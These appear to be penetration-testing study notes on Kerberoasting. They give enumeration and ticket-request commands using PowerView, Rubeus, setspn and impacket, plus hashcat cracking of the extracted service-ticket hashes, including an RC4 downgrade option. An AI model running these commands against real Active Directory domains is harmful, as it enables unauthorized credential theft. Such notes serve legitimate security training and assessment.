Identify

Windows

AD Module in powershell

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Local

Using Powerview

Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName

Local

setspn.exe -Q */*

Local

Using Rubeus

.\Rubeus.exe kerberoast /stats

Linux

impacket-GetUserSPNs -dc-ip <dcip> domain.local/username

remote

Exploit

From Linux

impacket-GetUserSPNs -dc-ip <dcip> domain.local/username -request

remote (request all tickets)

impacket-GetUserSPNs -dc-ip <dcip> domain.local/username -request-user

get single users tgs

you can also use -outputfile <name>

Crack hash

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt

From Windows

‣

Semi-manual approach

PowerView

Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname

list users with spn set

Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

request specific users tgs and specify output format

Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation

export tickets for processing

Rubeus

.\Rubeus.exe kerberoast /stats

.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

.\Rubeus.exe kerberoast /tgtdeleg /nowrap

tgtdeleg requests rc4 type rickets (way easier to crack)

On Windows Server 2019 and above you cannot force a downgrade to rc4 ticket type. It will always respond with AES at minimum.